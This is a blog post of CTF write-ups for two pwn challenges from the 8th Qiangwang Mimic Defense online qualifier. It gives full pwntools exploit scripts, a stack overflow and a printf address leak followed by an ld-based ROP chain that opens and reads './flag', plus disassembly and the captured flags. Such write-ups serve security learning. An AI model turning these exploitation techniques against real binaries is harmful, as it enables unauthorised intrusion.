落日歸山海,與你話清風。
527 words
3 minutes
Write-ups: 第八届「强网」拟态防御国际精英挑战赛-线上预选赛
babystack
Information
- Category: Pwn
- Points: 500
Description
拿到属于你的 shell 吧
Get your own shell
Write-up
?
Exploit
#!/usr/bin/env python3
from pwn import ( ELF, args, context, flat, process, raw_input, remote,)
FILE = "./babystack"HOST, PORT = "pwn-10ba42cde6.challenge.xctf.org.cn", 9999
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch(): global target if args.L: target = process(FILE) else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
payload = flat( b"A" * 24, ) target.sendafter(b"flag1:", payload) payload = flat( b"B" * 0xF8, 0x1337ABC, ) raw_input("DEBUG") target.sendlineafter(b"flag2:", payload)
target.interactive()
if __name__ == "__main__": main()Flag
flag{W528uZdUsvWbiWxqon5YLvZa8x6uo8IP}
stack
Information
- Category: Pwn
- Points: 500
Description
我不需要 libc,我猜你也可以不需要
I don’t need libc, and I guess you don’t need it either
Write-up
为了「讨好」,哦不,是「迎合」,迎合 description,我用 ld……
printf 使用 rbp 定位,可以用来泄漏栈地址和其它任意地址。
; Attributes: bp-based frame
; int sub_401354()sub_401354 proc near
s= byte ptr -10h
; __unwind {endbr64push rbpmov rbp, rspsub rsp, 10hlea rax, [rbp+s]mov edx, 10h ; nmov esi, 0 ; cmov rdi, rax ; scall _memsetlea rax, aCouldYouTellMe ; "Could you tell me your name?"mov rdi, rax ; scall _putslea rax, [rbp+s]mov edx, 18h ; nbytesmov rsi, rax ; bufmov edi, 0 ; fdcall _readlea rax, [rbp+s]mov rsi, raxlea rax, format ; "Hello, %s!\n"mov rdi, rax ; formatmov eax, 0call _printfnopleaveretn; } // starts at 401354sub_401354 endpExploit
#!/usr/bin/env python3
from pwn import ( ELF, args, context, flat, process, raw_input, remote,)
FILE = "./pwn_patched"HOST, PORT = "pwn-2229eb847f.challenge.xctf.org.cn", 9999
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch(): global target if args.L: target = process(FILE) else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
# raw_input("DEBUG") target.sendafter(b"name?", b"A" * 0x10) target.recvuntil(b"A" * 0x10) stack = int.from_bytes(target.recv(0x6), "little") ld = stack + 0xC0 ret = stack + 0x20 target.success(f"stack: {hex(stack)}")
payload = flat( b"A" * 0x60, ret + 0x60, 0x4013D4, # read ) # raw_input("DEBUG") target.sendafter(b"Any thing else?", payload)
payload = flat( 0x401413, # main b"A" * 0x58, ld + 0x10, 0x40139B, # printf ) target.sendline(payload) target.recvuntil(b"Hello, ") leaked_ld = int.from_bytes(target.recv(0x6), "little") - 0x3B2E0 target.success(f"libc: {hex(leaked_ld)}")
target.sendlineafter(b"name?", b"")
flag = stack - 0xA0 payload = flat( b"./flag\x00\x00", b"A" * 0x60, # openat leaked_ld + 0x25E6B, # pop rdi; ret -100, leaked_ld + 0x54DA, # pop rsi; ret flag, leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret 0x101, 0, 0, leaked_ld + 0x16629, # syscall; ret # read leaked_ld + 0x25E6B, # pop rdi; ret 0x3, leaked_ld + 0x54DA, # pop rsi; ret elf.bss() + 0x500, leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret 0, 0x1337, 0, leaked_ld + 0x16629, # syscall; ret # write leaked_ld + 0x25E6B, # pop rdi; ret 0x1, leaked_ld + 0x54DA, # pop rsi; ret elf.bss() + 0x500, leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret 1, 0x1337, 0, leaked_ld + 0x16629, # syscall; ret ) raw_input("DEBUG") target.sendafter(b"Any thing else?", payload)
target.interactive()
if __name__ == "__main__": main()Flag
flag{nfRlSH0ll0o4j4kd05IA6NJWtO8DYYSk}
Write-ups: 第八届「强网」拟态防御国际精英挑战赛-线上预选赛
https://cubeyond.net/posts/write-ups/2025-第八届强网拟态/